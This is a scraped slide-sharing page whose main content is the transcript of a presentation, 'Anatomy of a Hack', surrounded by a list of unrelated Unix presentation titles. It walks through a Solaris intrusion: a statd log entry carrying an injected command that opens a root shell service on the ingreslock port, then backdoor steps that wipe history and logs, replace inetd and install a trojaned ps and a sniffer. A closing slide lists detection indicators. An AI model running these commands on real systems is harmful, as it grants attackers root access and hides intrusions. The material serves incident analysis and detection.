Anatomy of a Hack... statd[146]: statd: attempt to create "/var/statmon/sm/; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd.

Slides:



Advertisements
Similar presentations
I/O & Perintah Dasar Linux Onno W. Purbo
Advertisements

Shell Script Assignment 1.
Introduction to UNIX CSE 2031 Fall May 2015.
Processes and Job Control. Foreground and Background (1)  Unix is a multi-tasking operating system –some of these tasks are being done by other users.
Unix. Outline Commands Environment Variables Basic Commands CommandMeaning lslist files and directories ls -alist all files and directories mkdirmake.
1 Introduction to UNIX Ke Liu
ATS Programming Short Course I INTRODUCTORY CONCEPTS Tuesday, Jan. 27 th, 2009 Essential Unix Commands.
Linux Basic TA for ITIS3100: Xu Fei
Basic linux shell commands and Makefiles. Log on to engsoft.rutgers.edu Open SSH Secure Shell – Quick Connect Hostname: engsoft.rutgers.edu Username/password:
Linux Files. Files and directories As in Windows directories are structures which contain –Other directories –Files.
1 Basics of Linux On linux machine: Login at your home directory Open a “shell” or “terminal” or “xterm” workspace (4) On windows machine Intall linux.
Introduction to UNIX A User’s Perspective: Day 2 – Command Basics.
UNIX Command-line Introduction Terence Parr. Navigating  cd  pwd  ls  pushd/pod  cd  pwd  ls  pushd/pod.
Shell Scripting Basics Arun Sethuraman. What’s a shell? Command line interpreter for Unix Bourne (sh), Bourne-again (bash), C shell (csh, tcsh), etc Handful.
Linux Commands LINUX COMMANDS.
CS 141 Labs are mandatory. Attendance will be taken in each lab. Make account on moodle. Projects will be submitted via moodle.
GETTING STARTED USING LINUX UBUNTU FOR A MULTI-USER SYSTEM Team 4 Lab Coordinator Manager Presentation Prep Webmaster Document Prep Faculty Facilitator.
Taeho Oh/PLUS 3rd CONCERT Workshop Nov Intrusion demonstration Part I Postech PLUS Taeho Oh (PLUS015)
File Permissions. What are the three categories of users that apply to file permissions? Owner (or user) Group All others (public, world, others)
LINUX Tuesday, 5 July :00 pm. Remote Login l Use Secure Shell (ssh) l Machine name/IP address E.g. ssh hydra.sma.nus.edu.sg Or ssh
Session 2 Wharton Summer Tech Camp Basic Unix. Agenda Cover basic UNIX commands and useful functions.
INTRODUCTION TO LINUX Jacob Chan. GNU/Linux Consists of Linux kernel, GNU utilities, and open source and commercial applications Works like Unix –Multi-user.
1 Operating Systems Lecture 2 UNIX and Shell Scripts.
POS/420 Philip Robbins – March 26, 2013 (Week 3) University of Phoenix Mililani Campus Introduction to Unix.
Unix/Linux cs3353. The Shell The shell is a program that acts as the interface between the user and the kernel. –The shell is fully programmable and will.
Introduction to UNIX Road Map: 1. UNIX Structure 2. Components of UNIX 3. Process Structure 4. Shell & Utility Programs 5. Using Files & Directories 6.
L&T Infotech1 UNIX – Getting Started - Aneesh Ramani.
ITR3 lecture 6: intoduction to UNIX Thomas Krichel
November 5, 2015CIS 118 Intro to UNIX What’s a Unix? Unix is an Operating System Designed for high-traffic usage Many variants –Linux, BSD: free versions.
Lecture 24CS311 – Operating Systems 1 1 CS311 – Lecture 24 Outline Final Exam Study Guide Note: These lecture notes are not intended replace your notes.
Intro to UNIX Presented by: Student Ambassadors: Lauren Lewis Martin Sung.
Introduction to Programming Using C An Introduction to Operating Systems.
CSC414 “Introduction to UNIX/ Linux” Lecture 5. Schedule 1. Introduction to Unix/ Linux 2. Kernel Structure and Device Drivers. 3. System and Storage.
CS252: Systems Programming Ninghui Li Slides by Prof. Gustavo Rodriguez-Rivera Topic 7: Unix Tools and Shell Scripts.
Basic of UNIX For fresh members of SPARCS
CSE 374 Programming Concepts & Tools Hal Perkins Fall 2015 Lecture 2a – A Unix Command Sampler (Courtesy of David Notkin, CSE 303)
EGEE-III INFSO-RI Enabling Grids for E-sciencE Apr. 25, Grid Computing Hands On Training for Users Faculty of Sciences, University.
Unix network Services. Configuring a network interface In Unix there are essentially two commands that are used to enable TCP/IP. ifconfig route.
1 CS3695/M6-109 – Network Vulnerability Assessment & Risk Mitigation – Introduction to Unix & Linux.
A Brief Overview of Unix Brandon Bohrer. Topics What is Unix? – Quick introduction Documentation – Where to get it, how to use it Text Editors – Know.
1 CS3695 – Network Vulnerability Assessment & Risk Mitigation – Introduction to Unix & Linux.
Working With TFTP. Basics of TFTP  Simple file transfer protocol  Wikipedia:   RFC 1350.
Agenda The Bourne Shell – Part I Redirection ( >, >>,
Experiment No. 13 Presented by, Mr. Satish Pise. Write a shell script which checks disk space and store the value to the variable and display it. #!/bin/sh.
Linux Workshop Session 2 By Amol and Prem. Overview of Presentation Brief Review Useful tools Remote Access Troubleshooting.
UNIX To do work for the class, you will be using the Unix operating system. Once connected to the system, you will be presented with a login screen. Once.
File permissions Operating systems I800
Getting started with CentOS Linux
CS3695/M6-109 – Network Vulnerability Assessment & Risk Mitigation –
Linux 101 Training Module Linux Basics.
Linux Commands Help HANDS ON TRAINING Author: Muhammad Laique
Some Linux Commands.
Command Line Interface for Beginners
Shell Script Assignment 1.
Shell Environments.
Linux Basic Commands Visit to more Learning Resources.
Internet-of-Things (IoT)
CS 60 Discussion Review.
Introduction to Computer Organization & Systems
UNIX Reference Sheets CSE 2031 Fall 2010.
Getting started with CentOS Linux
Working with Mac OS and Linux
Yung-Hsiang Lu Purdue University
Module 6 Working with Files and Directories
Linux Commands LINUX COMMANDS.
Hola Hadoop.
January 26th, 2004 Class Meeting 2
LPI Linux Certification
Presentation transcript:

Anatomy of a Hack... statd[146]: statd: attempt to create "/var/statmon/sm/; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &" Create a second inet.conf file with a root shell service using the ingress lock port. Start a second copy of inetd with the conf file to allow later connections. Then what….

Phase 2 - back doors unset HISTFILE; unset SAVEHIST cp doc /usr/sbin/inetd; chown root /usr/sbin/inetd; chgrp root /usr/sbin/inetd; touch /usr/sbin/inetd; rm -rf doc /tmp/bob /var/adm/messages /usr/lib/nfs/statd; /usr/sbin/inetd -s; telnet localhost; /usr/sbin/inetd -s; ps -ef | grep inetd | grep bob | awk '{print "kill -9 " $2 }' > boo chmod 700 boo./boo rm -rf boo

Phase 2 Continued mkdir /usr/man/tmp mv update ps /usr/man/tmp cd /usr/man/tmp echo 1 \"./update -s -o output\" > /kernel/pssys chmod 755 ps update./update -s -o output & cp ps /usr/ucb/ps mv ps /usr/bin/ps touch /usr/bin/ps /usr/ucb/ps cd / ps -ef | grep bob | grep -v grep ps -ef | grep stat | grep -v grep ps -ef | grep update

Detection b Several copies of inetd running b /kernel/pssys exists b /usr/bin/ps and /usr/ucb/ps same size. b /usr/man/tmp/[update|output] exist b Log messages from first slide